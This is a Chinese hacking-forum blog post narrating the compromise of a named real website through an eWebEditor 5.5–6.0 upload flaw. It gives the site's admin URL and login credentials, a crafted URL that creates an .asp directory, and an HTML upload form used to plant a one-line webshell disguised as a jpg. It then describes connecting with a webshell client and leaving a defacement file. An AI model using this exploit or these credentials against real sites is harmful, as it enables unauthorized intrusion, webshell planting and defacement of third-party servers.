首发：听雨安全论坛、
个人博客：www.qianbi.tk
曾经在听雨看到过 一个 0day
ewebeditor 5.5 - 6.0 鸡肋漏洞
但是一直搞不明白为什么是鸡肋、
但是。、今天就是这个鸡肋帮我拿下了shell
群里唐宋大牛 。

丢了一个后台、地址：
http://www.htysmt.com/admin/
admin
htysmt

然后进去看了看。后台上传是没有用的。数据库又找不到。插不进去一句话、。

正在思考呢。哇操。大牛把shell丢出来了。我了个草的。果然是大牛。这时候呢。我想看看自己的水平有多高捏。

于是就有了这个、。

后台的上传是 ewebeditor 编辑器、能找到后台、账号密码木有、

查看后台、得到ewebeditor 地址、

然后得到地址


可是在这里的时候思路断了一下、是大牛提醒我的 这个有个0day、

然后就告诉我了、我寻思着论坛上也没有哪个0day的教材、

小弟不才、拿出来演示一下、献丑了、

得到地址之后、很简单的、

我们构造这样一个页面

http://www.htysmt.com/admin/eweb ... upcusdir=a.asp

这样会在   网站目录下生产 a.asp这个文件、

然后再本地构造html
<form action="http://www.htysmt.com/admin/ewebeditor/asp/upload.asp?action=savetype=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>

然后打开


我是上传的一句话（jpg格式）

然后菜刀链接。

最后 挂个txt 闪人。